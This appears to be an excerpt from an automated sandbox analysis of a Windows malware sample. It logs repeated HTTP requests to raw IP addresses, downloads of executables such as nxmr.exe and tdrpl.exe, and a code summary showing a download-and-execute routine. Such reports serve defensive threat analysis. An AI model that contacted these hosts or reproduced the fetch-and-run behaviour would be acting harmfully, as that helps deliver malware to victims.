                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /nxmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.84
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /ALLBSTATAASASD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: unknownTCP traffic detected without corresponding DNS query: 178.90.122.209
                                Source: unknownTCP traffic detected without corresponding DNS query: 178.90.122.209
                                Source: unknownTCP traffic detected without corresponding DNS query: 178.90.122.209
                                Source: unknownTCP traffic detected without corresponding DNS query: 178.90.122.209
                                Source: unknownTCP traffic detected without corresponding DNS query: 178.90.122.209
                                Source: unknownTCP traffic detected without corresponding DNS query: 187.133.73.5
                                Source: unknownTCP traffic detected without corresponding DNS query: 187.133.73.5
                                Source: unknownTCP traffic detected without corresponding DNS query: 187.133.73.5
                                Source: unknownTCP traffic detected without corresponding DNS query: 187.133.73.5
                                Source: unknownTCP traffic detected without corresponding DNS query: 178.90.122.209
                                Source: unknownTCP traffic detected without corresponding DNS query: 187.133.73.5
                                Source: unknownTCP traffic detected without corresponding DNS query: 187.133.73.5
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.76.120.41
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.76.120.41
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.76.120.41
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.76.120.41
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.76.120.41
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeCode function: 0_2_00A91061 Sleep,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,wsprintfW,wsprintfW,PathFileExistsW,rand,wsprintfW,strlen,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_00A91061
                                Source: global trafficHTTP traffic detected: GET /tdrpl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /nxmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.84
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /ALLBSTATAASASD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                                Source: global trafficDNS traffic detected: DNS query: twizthash.net
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:20 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:22 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
